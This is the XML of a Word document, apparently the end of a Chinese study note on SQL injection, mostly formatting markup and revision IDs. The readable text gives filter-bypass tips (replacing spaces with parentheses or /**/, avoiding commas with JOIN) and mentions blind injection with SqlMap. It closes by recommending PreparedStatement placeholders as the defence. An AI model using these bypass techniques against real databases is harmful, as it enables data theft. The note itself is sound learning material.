          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL注入七步法是基本原理，现实中不可能如此简单。但是明白基本的原理后，我们根据实际情况满满注入SQL，获取数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>当注入点设置很多过滤，我们首先可以用替代这个关键字或字符，来测试其他关键字有没有被过滤。如：空格被过滤可以用 ( ),  /**/ 等；逗号被过滤用JOIN横向连接表对用查询字段数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>当报错信息或结果不能通过网页看见，利用布尔条件制造使结果以另一种方法被呈现。这是盲注，当然方法多多。但是当我们需要以ASCII码比较字符得出结果，我们就要使用工具、脚本来批量快速注入得出结果，所以我们还要掌握如SqlMap等工具的使用方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>最后，SQL注入最核心的原理就是字符串的拼接，才导致不法分子窃取数据。所以，在之后操作数据库的编程中，除了过滤用户的输入。我们可以使用占位符来操纵SQL。如JDBC中的预编译语句对象PreparedStatement可以防止SQL注入。因为这不是字符串拼接，是占位符，语句已经预先编辑好，无论如何改变注入点的内容，都是作为一个值来执行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Courier New" w:hAnsi="Courier New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Courier New" w:hAnsi="Courier New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9" name="文本框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ascii="Courier New" w:hAnsi="Courier New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 w:ascii="Courier New" w:hAnsi="Courier New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Courier New" w:hAnsi="Courier New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Courier New" w:hAnsi="Courier New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FxXVf4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ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia"/>
                        <w:lang w:eastAsia="zh-CN"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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Courier New" w:hAnsi="Courier New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 w:ascii="Courier New" w:hAnsi="Courier New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AB6147"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8FAB614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91CBB143"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="91CBB14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954C91DE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="954C91D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9D89D4C2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9D89D4C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CF390743"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CF39074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E9D0B5DA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E9D0B5D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06020389"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="060203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086256D4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="086256D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0B697D7F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0B697D7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0F49061E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0F49061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4424C5A8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4424C5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4557E4BC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4557E4B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477DAFAD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="477DAFA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>
    <w:nsid w:val="47C4126E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="47C4126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>
    <w:nsid w:val="5147ED50"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5147ED5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5">
    <w:nsid w:val="5FE9D6AF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5FE9D6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728E698B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="728E698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9"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="10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135B"/>
    <w:rsid w:val="00C720E2"/>
    <w:rsid w:val="00FE4D18"/>
    <w:rsid w:val="013179D2"/>
    <w:rsid w:val="01A07298"/>
    <w:rsid w:val="01AB0DAF"/>
    <w:rsid w:val="01B40377"/>
    <w:rsid w:val="01E06FC2"/>
    <w:rsid w:val="01E16827"/>
    <w:rsid w:val="01EF0165"/>
    <w:rsid w:val="02135904"/>
    <w:rsid w:val="02411D75"/>
    <w:rsid w:val="024142D2"/>
    <w:rsid w:val="025A0A4F"/>
    <w:rsid w:val="02840654"/>
    <w:rsid w:val="02B53D15"/>
    <w:rsid w:val="0328229C"/>
    <w:rsid w:val="03352966"/>
    <w:rsid w:val="034875FF"/>
    <w:rsid w:val="034931BD"/>
    <w:rsid w:val="0362200A"/>
    <w:rsid w:val="03645DBA"/>
    <w:rsid w:val="03753C50"/>
    <w:rsid w:val="039540C1"/>
    <w:rsid w:val="03B279B0"/>
    <w:rsid w:val="03C451E5"/>
    <w:rsid w:val="03E174A3"/>
    <w:rsid w:val="04513EB4"/>
    <w:rsid w:val="047550E9"/>
    <w:rsid w:val="048F6D4E"/>
    <w:rsid w:val="04BA4672"/>
    <w:rsid w:val="04D524C3"/>
    <w:rsid w:val="04D55487"/>
    <w:rsid w:val="05286DBB"/>
    <w:rsid w:val="057A4E9A"/>
    <w:rsid w:val="05B75FF4"/>
    <w:rsid w:val="061778C7"/>
    <w:rsid w:val="064404A0"/>
    <w:rsid w:val="065F1268"/>
    <w:rsid w:val="067C704E"/>
    <w:rsid w:val="06A62409"/>
    <w:rsid w:val="06CE7CBC"/>
    <w:rsid w:val="06E927AA"/>
    <w:rsid w:val="073A5A19"/>
    <w:rsid w:val="07875413"/>
    <w:rsid w:val="0793148F"/>
    <w:rsid w:val="0796653A"/>
    <w:rsid w:val="07983D41"/>
    <w:rsid w:val="07AC2481"/>
    <w:rsid w:val="08831F1E"/>
    <w:rsid w:val="08B42203"/>
    <w:rsid w:val="08BB771B"/>
    <w:rsid w:val="08BD2D41"/>
    <w:rsid w:val="08D04B71"/>
    <w:rsid w:val="08D23094"/>
    <w:rsid w:val="08D67696"/>
    <w:rsid w:val="08EF28FF"/>
    <w:rsid w:val="08EF299C"/>
    <w:rsid w:val="08FB39EB"/>
    <w:rsid w:val="09177B09"/>
    <w:rsid w:val="09193B3E"/>
    <w:rsid w:val="0939521A"/>
    <w:rsid w:val="0966227E"/>
    <w:rsid w:val="0977414F"/>
    <w:rsid w:val="099D6C4B"/>
    <w:rsid w:val="09CA2322"/>
    <w:rsid w:val="09CC51FB"/>
    <w:rsid w:val="09D97349"/>
    <w:rsid w:val="09DB4135"/>
    <w:rsid w:val="09E9545E"/>
    <w:rsid w:val="0A8B6CC1"/>
    <w:rsid w:val="0A9F72DA"/>
    <w:rsid w:val="0AC33717"/>
    <w:rsid w:val="0B1110FB"/>
    <w:rsid w:val="0B192630"/>
    <w:rsid w:val="0B8A6233"/>
    <w:rsid w:val="0BBD4CAE"/>
    <w:rsid w:val="0C114E4C"/>
    <w:rsid w:val="0C170829"/>
    <w:rsid w:val="0C2335DC"/>
    <w:rsid w:val="0C2C3C23"/>
    <w:rsid w:val="0C4C59CE"/>
    <w:rsid w:val="0C882385"/>
    <w:rsid w:val="0CFA47F7"/>
    <w:rsid w:val="0D3A1CD9"/>
    <w:rsid w:val="0D3B1B3F"/>
    <w:rsid w:val="0D4E45E7"/>
    <w:rsid w:val="0D6F485E"/>
    <w:rsid w:val="0D7032E7"/>
    <w:rsid w:val="0D82718E"/>
    <w:rsid w:val="0DED51C9"/>
    <w:rsid w:val="0E2722D8"/>
    <w:rsid w:val="0E384AB6"/>
    <w:rsid w:val="0E740AAB"/>
    <w:rsid w:val="0E884DC8"/>
    <w:rsid w:val="0ECD505B"/>
    <w:rsid w:val="0ED2113D"/>
    <w:rsid w:val="0EE04C34"/>
    <w:rsid w:val="0EFC3291"/>
    <w:rsid w:val="0F1F37CB"/>
    <w:rsid w:val="0F3C64FA"/>
    <w:rsid w:val="0F71602F"/>
    <w:rsid w:val="0F924563"/>
    <w:rsid w:val="0FA151B4"/>
    <w:rsid w:val="0FBB450C"/>
    <w:rsid w:val="0FF13F7B"/>
    <w:rsid w:val="10237930"/>
    <w:rsid w:val="10255A1A"/>
    <w:rsid w:val="103E0CC2"/>
    <w:rsid w:val="10520022"/>
    <w:rsid w:val="105B1982"/>
    <w:rsid w:val="10B91F59"/>
    <w:rsid w:val="11384750"/>
    <w:rsid w:val="11B12A45"/>
    <w:rsid w:val="11BE41CE"/>
    <w:rsid w:val="11D1564D"/>
    <w:rsid w:val="11DB6F30"/>
    <w:rsid w:val="121364C3"/>
    <w:rsid w:val="121E6430"/>
    <w:rsid w:val="12303B6D"/>
    <w:rsid w:val="123424C3"/>
    <w:rsid w:val="12381A4B"/>
    <w:rsid w:val="12632F4C"/>
    <w:rsid w:val="12731E54"/>
    <w:rsid w:val="1273516C"/>
    <w:rsid w:val="1279434F"/>
    <w:rsid w:val="12950FFB"/>
    <w:rsid w:val="12B3403D"/>
    <w:rsid w:val="12D575E0"/>
    <w:rsid w:val="12FE16E2"/>
    <w:rsid w:val="130E1E17"/>
    <w:rsid w:val="132F722A"/>
    <w:rsid w:val="135A6BCB"/>
    <w:rsid w:val="136B735E"/>
    <w:rsid w:val="138145A0"/>
    <w:rsid w:val="13887F5E"/>
    <w:rsid w:val="139634D9"/>
    <w:rsid w:val="13995F83"/>
    <w:rsid w:val="139E16EF"/>
    <w:rsid w:val="13AF1D83"/>
    <w:rsid w:val="13DF2470"/>
    <w:rsid w:val="13F94D00"/>
    <w:rsid w:val="13FC59B5"/>
    <w:rsid w:val="140C5E95"/>
    <w:rsid w:val="14290D4C"/>
    <w:rsid w:val="142F5B6B"/>
    <w:rsid w:val="14356C1E"/>
    <w:rsid w:val="143A6DD4"/>
    <w:rsid w:val="144261E6"/>
    <w:rsid w:val="146B1BB4"/>
    <w:rsid w:val="14716912"/>
    <w:rsid w:val="149952BB"/>
    <w:rsid w:val="14A40ACD"/>
    <w:rsid w:val="14A74DB1"/>
    <w:rsid w:val="14B47BCF"/>
    <w:rsid w:val="14E16636"/>
    <w:rsid w:val="14ED553D"/>
    <w:rsid w:val="15141883"/>
    <w:rsid w:val="151E5C3F"/>
    <w:rsid w:val="16311CF2"/>
    <w:rsid w:val="16674FA0"/>
    <w:rsid w:val="16AB53F2"/>
    <w:rsid w:val="16B31606"/>
    <w:rsid w:val="16C31053"/>
    <w:rsid w:val="16F90649"/>
    <w:rsid w:val="172C0BA6"/>
    <w:rsid w:val="179A7911"/>
    <w:rsid w:val="179B7BFC"/>
    <w:rsid w:val="17B247BE"/>
    <w:rsid w:val="17C7701F"/>
    <w:rsid w:val="17C95249"/>
    <w:rsid w:val="17D06F94"/>
    <w:rsid w:val="17E8108F"/>
    <w:rsid w:val="17FC0699"/>
    <w:rsid w:val="18074F3A"/>
    <w:rsid w:val="1847460F"/>
    <w:rsid w:val="184B337B"/>
    <w:rsid w:val="18803191"/>
    <w:rsid w:val="18E53FFA"/>
    <w:rsid w:val="193E2B3E"/>
    <w:rsid w:val="194420FA"/>
    <w:rsid w:val="19464658"/>
    <w:rsid w:val="194A5A47"/>
    <w:rsid w:val="197C48A7"/>
    <w:rsid w:val="198205C9"/>
    <w:rsid w:val="198E1554"/>
    <w:rsid w:val="19997F7D"/>
    <w:rsid w:val="19A23468"/>
    <w:rsid w:val="19B540E3"/>
    <w:rsid w:val="19C163E5"/>
    <w:rsid w:val="19C93C58"/>
    <w:rsid w:val="1A0B2084"/>
    <w:rsid w:val="1A131EC0"/>
    <w:rsid w:val="1A3E3E66"/>
    <w:rsid w:val="1A4126F4"/>
    <w:rsid w:val="1A484978"/>
    <w:rsid w:val="1ABA15C0"/>
    <w:rsid w:val="1ADB12DE"/>
    <w:rsid w:val="1ADD437B"/>
    <w:rsid w:val="1AF12047"/>
    <w:rsid w:val="1B084A24"/>
    <w:rsid w:val="1B2B1119"/>
    <w:rsid w:val="1B383B9A"/>
    <w:rsid w:val="1B434775"/>
    <w:rsid w:val="1B5C55A7"/>
    <w:rsid w:val="1B813E13"/>
    <w:rsid w:val="1BB270A5"/>
    <w:rsid w:val="1BBC245D"/>
    <w:rsid w:val="1BC426EF"/>
    <w:rsid w:val="1BC532E3"/>
    <w:rsid w:val="1BCD08D1"/>
    <w:rsid w:val="1C192E44"/>
    <w:rsid w:val="1C2016E0"/>
    <w:rsid w:val="1C6024AA"/>
    <w:rsid w:val="1C621AA2"/>
    <w:rsid w:val="1C6A51E6"/>
    <w:rsid w:val="1C73742D"/>
    <w:rsid w:val="1CAC2584"/>
    <w:rsid w:val="1CBF2C65"/>
    <w:rsid w:val="1CD31799"/>
    <w:rsid w:val="1CED5375"/>
    <w:rsid w:val="1CF3784C"/>
    <w:rsid w:val="1D0F6A21"/>
    <w:rsid w:val="1D2A6D90"/>
    <w:rsid w:val="1D2B5D28"/>
    <w:rsid w:val="1D3E71AA"/>
    <w:rsid w:val="1D6114A6"/>
    <w:rsid w:val="1D6551EB"/>
    <w:rsid w:val="1D812DE6"/>
    <w:rsid w:val="1E3A0E9D"/>
    <w:rsid w:val="1E6D6C39"/>
    <w:rsid w:val="1F034004"/>
    <w:rsid w:val="1F092A13"/>
    <w:rsid w:val="1F2F731E"/>
    <w:rsid w:val="1F4429A1"/>
    <w:rsid w:val="1F5F7633"/>
    <w:rsid w:val="1F746FE0"/>
    <w:rsid w:val="1F8248B4"/>
    <w:rsid w:val="1FA3677B"/>
    <w:rsid w:val="1FB22966"/>
    <w:rsid w:val="1FCC78D7"/>
    <w:rsid w:val="20224160"/>
    <w:rsid w:val="203C7344"/>
    <w:rsid w:val="204635E7"/>
    <w:rsid w:val="204E5D5E"/>
    <w:rsid w:val="20542987"/>
    <w:rsid w:val="20601FB6"/>
    <w:rsid w:val="20624FDB"/>
    <w:rsid w:val="206342BD"/>
    <w:rsid w:val="206663DF"/>
    <w:rsid w:val="208B7230"/>
    <w:rsid w:val="208D2926"/>
    <w:rsid w:val="20A00A28"/>
    <w:rsid w:val="20B038CB"/>
    <w:rsid w:val="20C14A04"/>
    <w:rsid w:val="20C41C61"/>
    <w:rsid w:val="20DD5700"/>
    <w:rsid w:val="20EF03B1"/>
    <w:rsid w:val="20F92345"/>
    <w:rsid w:val="21084F9A"/>
    <w:rsid w:val="213877E6"/>
    <w:rsid w:val="213F3EED"/>
    <w:rsid w:val="215B1168"/>
    <w:rsid w:val="21752FBE"/>
    <w:rsid w:val="217F35A9"/>
    <w:rsid w:val="21A90336"/>
    <w:rsid w:val="21BA6D84"/>
    <w:rsid w:val="21CB1E19"/>
    <w:rsid w:val="21FC4DFA"/>
    <w:rsid w:val="2210239C"/>
    <w:rsid w:val="221F7058"/>
    <w:rsid w:val="223F7495"/>
    <w:rsid w:val="224317F7"/>
    <w:rsid w:val="229917D0"/>
    <w:rsid w:val="22B748DA"/>
    <w:rsid w:val="22DA6E46"/>
    <w:rsid w:val="22EF7184"/>
    <w:rsid w:val="2302755F"/>
    <w:rsid w:val="236635B8"/>
    <w:rsid w:val="23913680"/>
    <w:rsid w:val="23B90C17"/>
    <w:rsid w:val="23BC7ED6"/>
    <w:rsid w:val="23C44238"/>
    <w:rsid w:val="23D239FB"/>
    <w:rsid w:val="23E14E9E"/>
    <w:rsid w:val="23E7534E"/>
    <w:rsid w:val="23F42F5B"/>
    <w:rsid w:val="23FC7BEA"/>
    <w:rsid w:val="24240A8C"/>
    <w:rsid w:val="243617A6"/>
    <w:rsid w:val="2442613A"/>
    <w:rsid w:val="246813C0"/>
    <w:rsid w:val="249C0136"/>
    <w:rsid w:val="24A34F00"/>
    <w:rsid w:val="24A4409F"/>
    <w:rsid w:val="24E53EC9"/>
    <w:rsid w:val="25442C5C"/>
    <w:rsid w:val="25514671"/>
    <w:rsid w:val="257C672B"/>
    <w:rsid w:val="2584535B"/>
    <w:rsid w:val="2589767E"/>
    <w:rsid w:val="25D1452C"/>
    <w:rsid w:val="25EE1ACF"/>
    <w:rsid w:val="25F31DBA"/>
    <w:rsid w:val="25F35464"/>
    <w:rsid w:val="25F729C2"/>
    <w:rsid w:val="262D4670"/>
    <w:rsid w:val="264332A4"/>
    <w:rsid w:val="26475CF4"/>
    <w:rsid w:val="264B290B"/>
    <w:rsid w:val="268E6F14"/>
    <w:rsid w:val="26CC1FA4"/>
    <w:rsid w:val="26D36E0D"/>
    <w:rsid w:val="26D57A35"/>
    <w:rsid w:val="26DE21F7"/>
    <w:rsid w:val="26ED35A9"/>
    <w:rsid w:val="271673E5"/>
    <w:rsid w:val="273405E1"/>
    <w:rsid w:val="27481ECB"/>
    <w:rsid w:val="278C0E79"/>
    <w:rsid w:val="27A227E9"/>
    <w:rsid w:val="27A25584"/>
    <w:rsid w:val="27B11045"/>
    <w:rsid w:val="27C73599"/>
    <w:rsid w:val="27E376C3"/>
    <w:rsid w:val="27F21E2F"/>
    <w:rsid w:val="27FE0FA1"/>
    <w:rsid w:val="28395B25"/>
    <w:rsid w:val="28492A73"/>
    <w:rsid w:val="288B37BC"/>
    <w:rsid w:val="28A500DE"/>
    <w:rsid w:val="28AF2B38"/>
    <w:rsid w:val="290947CD"/>
    <w:rsid w:val="291C1B11"/>
    <w:rsid w:val="29441F31"/>
    <w:rsid w:val="295411A2"/>
    <w:rsid w:val="29A80670"/>
    <w:rsid w:val="29AC7A11"/>
    <w:rsid w:val="29AE703C"/>
    <w:rsid w:val="29B53ED4"/>
    <w:rsid w:val="29D608A4"/>
    <w:rsid w:val="29DA53DD"/>
    <w:rsid w:val="2A260D5D"/>
    <w:rsid w:val="2A32791B"/>
    <w:rsid w:val="2A382815"/>
    <w:rsid w:val="2A3A0F07"/>
    <w:rsid w:val="2A6F0195"/>
    <w:rsid w:val="2A6F4FAD"/>
    <w:rsid w:val="2A8B5E43"/>
    <w:rsid w:val="2A8B62CD"/>
    <w:rsid w:val="2AB53756"/>
    <w:rsid w:val="2AB559AE"/>
    <w:rsid w:val="2ADC5AED"/>
    <w:rsid w:val="2AE20620"/>
    <w:rsid w:val="2B0133DD"/>
    <w:rsid w:val="2B6240CB"/>
    <w:rsid w:val="2B7D56BB"/>
    <w:rsid w:val="2B8C0762"/>
    <w:rsid w:val="2B971D72"/>
    <w:rsid w:val="2BCC4DB6"/>
    <w:rsid w:val="2C001D35"/>
    <w:rsid w:val="2C264A04"/>
    <w:rsid w:val="2C4D595F"/>
    <w:rsid w:val="2C5752AC"/>
    <w:rsid w:val="2C913D4D"/>
    <w:rsid w:val="2CA31EDD"/>
    <w:rsid w:val="2CE03935"/>
    <w:rsid w:val="2CF72C72"/>
    <w:rsid w:val="2D1D3CC3"/>
    <w:rsid w:val="2D4C1C70"/>
    <w:rsid w:val="2D504228"/>
    <w:rsid w:val="2D994969"/>
    <w:rsid w:val="2DB15D68"/>
    <w:rsid w:val="2DC64FD1"/>
    <w:rsid w:val="2DDF2BCA"/>
    <w:rsid w:val="2E037B12"/>
    <w:rsid w:val="2E271258"/>
    <w:rsid w:val="2E895E1E"/>
    <w:rsid w:val="2E8C35A7"/>
    <w:rsid w:val="2ED6232E"/>
    <w:rsid w:val="2F0077D5"/>
    <w:rsid w:val="2F2C6A0E"/>
    <w:rsid w:val="2F4E312B"/>
    <w:rsid w:val="2F682E28"/>
    <w:rsid w:val="2F877805"/>
    <w:rsid w:val="2F897BF4"/>
    <w:rsid w:val="2FC06491"/>
    <w:rsid w:val="2FD17FE1"/>
    <w:rsid w:val="2FDE722C"/>
    <w:rsid w:val="2FE945E6"/>
    <w:rsid w:val="300725FB"/>
    <w:rsid w:val="3011665E"/>
    <w:rsid w:val="30227AD1"/>
    <w:rsid w:val="303B254D"/>
    <w:rsid w:val="305B33FE"/>
    <w:rsid w:val="30AA3141"/>
    <w:rsid w:val="30AA52D7"/>
    <w:rsid w:val="30BB5A0F"/>
    <w:rsid w:val="30C828E7"/>
    <w:rsid w:val="30D71100"/>
    <w:rsid w:val="30FF7403"/>
    <w:rsid w:val="312D45B6"/>
    <w:rsid w:val="313524B9"/>
    <w:rsid w:val="314B07DE"/>
    <w:rsid w:val="31594A9B"/>
    <w:rsid w:val="315D0EB6"/>
    <w:rsid w:val="318C1F64"/>
    <w:rsid w:val="31985DE0"/>
    <w:rsid w:val="31A721AC"/>
    <w:rsid w:val="31DB5DA5"/>
    <w:rsid w:val="31E438B5"/>
    <w:rsid w:val="31F51B91"/>
    <w:rsid w:val="320A0478"/>
    <w:rsid w:val="321162A8"/>
    <w:rsid w:val="322A6DA5"/>
    <w:rsid w:val="322C3C77"/>
    <w:rsid w:val="32696CDD"/>
    <w:rsid w:val="327F05D7"/>
    <w:rsid w:val="32976AFD"/>
    <w:rsid w:val="32D072EF"/>
    <w:rsid w:val="32ED0C14"/>
    <w:rsid w:val="33016877"/>
    <w:rsid w:val="33150F79"/>
    <w:rsid w:val="332E5027"/>
    <w:rsid w:val="335E739B"/>
    <w:rsid w:val="336479A6"/>
    <w:rsid w:val="338F64E7"/>
    <w:rsid w:val="33CA629E"/>
    <w:rsid w:val="33E020B3"/>
    <w:rsid w:val="340701DC"/>
    <w:rsid w:val="341B1094"/>
    <w:rsid w:val="34221D8B"/>
    <w:rsid w:val="342766CA"/>
    <w:rsid w:val="343A1509"/>
    <w:rsid w:val="345B5125"/>
    <w:rsid w:val="3477691D"/>
    <w:rsid w:val="349424A2"/>
    <w:rsid w:val="34DD364D"/>
    <w:rsid w:val="350A7A6F"/>
    <w:rsid w:val="35141F16"/>
    <w:rsid w:val="35403615"/>
    <w:rsid w:val="35502EEA"/>
    <w:rsid w:val="35887D5E"/>
    <w:rsid w:val="359B36D9"/>
    <w:rsid w:val="359C4826"/>
    <w:rsid w:val="35D34C4C"/>
    <w:rsid w:val="35D62FA9"/>
    <w:rsid w:val="35F65AD5"/>
    <w:rsid w:val="360D4770"/>
    <w:rsid w:val="364E3B29"/>
    <w:rsid w:val="365738E0"/>
    <w:rsid w:val="366706AD"/>
    <w:rsid w:val="367B26B7"/>
    <w:rsid w:val="368C34B5"/>
    <w:rsid w:val="36A614E1"/>
    <w:rsid w:val="36B429E7"/>
    <w:rsid w:val="36B92EEE"/>
    <w:rsid w:val="36CF4DD9"/>
    <w:rsid w:val="36D67675"/>
    <w:rsid w:val="37081F6A"/>
    <w:rsid w:val="370D0116"/>
    <w:rsid w:val="3731730C"/>
    <w:rsid w:val="37360F8C"/>
    <w:rsid w:val="37661C4B"/>
    <w:rsid w:val="376F2553"/>
    <w:rsid w:val="37862065"/>
    <w:rsid w:val="37905E5E"/>
    <w:rsid w:val="379137CD"/>
    <w:rsid w:val="37BF5B27"/>
    <w:rsid w:val="37CE6A7D"/>
    <w:rsid w:val="37D56715"/>
    <w:rsid w:val="37E0574A"/>
    <w:rsid w:val="37E70982"/>
    <w:rsid w:val="383B7BF6"/>
    <w:rsid w:val="388D51D7"/>
    <w:rsid w:val="38942E44"/>
    <w:rsid w:val="38CA571D"/>
    <w:rsid w:val="38F21550"/>
    <w:rsid w:val="38F27521"/>
    <w:rsid w:val="38F74AE4"/>
    <w:rsid w:val="392A71A4"/>
    <w:rsid w:val="3935537E"/>
    <w:rsid w:val="39546BAD"/>
    <w:rsid w:val="3984039B"/>
    <w:rsid w:val="39B733A8"/>
    <w:rsid w:val="39BA2717"/>
    <w:rsid w:val="39EC2513"/>
    <w:rsid w:val="3A482A1B"/>
    <w:rsid w:val="3A633AE3"/>
    <w:rsid w:val="3A657C3C"/>
    <w:rsid w:val="3A78694C"/>
    <w:rsid w:val="3A7A5AF4"/>
    <w:rsid w:val="3AA26CBE"/>
    <w:rsid w:val="3AC34808"/>
    <w:rsid w:val="3AD11968"/>
    <w:rsid w:val="3ADE3B9C"/>
    <w:rsid w:val="3ADF34E2"/>
    <w:rsid w:val="3AF107D1"/>
    <w:rsid w:val="3B7E5F61"/>
    <w:rsid w:val="3B8238C6"/>
    <w:rsid w:val="3BA41084"/>
    <w:rsid w:val="3BAA3C35"/>
    <w:rsid w:val="3BFF6A9C"/>
    <w:rsid w:val="3C0A2C0A"/>
    <w:rsid w:val="3C2D1774"/>
    <w:rsid w:val="3C3F67D9"/>
    <w:rsid w:val="3C476165"/>
    <w:rsid w:val="3C8F28C6"/>
    <w:rsid w:val="3CCD235C"/>
    <w:rsid w:val="3CF109C1"/>
    <w:rsid w:val="3D3F70D0"/>
    <w:rsid w:val="3D653E3F"/>
    <w:rsid w:val="3D654F68"/>
    <w:rsid w:val="3D813306"/>
    <w:rsid w:val="3D8A12DC"/>
    <w:rsid w:val="3DAF1D3E"/>
    <w:rsid w:val="3DB778C8"/>
    <w:rsid w:val="3E257FB4"/>
    <w:rsid w:val="3E3D1B41"/>
    <w:rsid w:val="3E510B54"/>
    <w:rsid w:val="3E7D1FA6"/>
    <w:rsid w:val="3E8C0713"/>
    <w:rsid w:val="3EA5542E"/>
    <w:rsid w:val="3EC632BF"/>
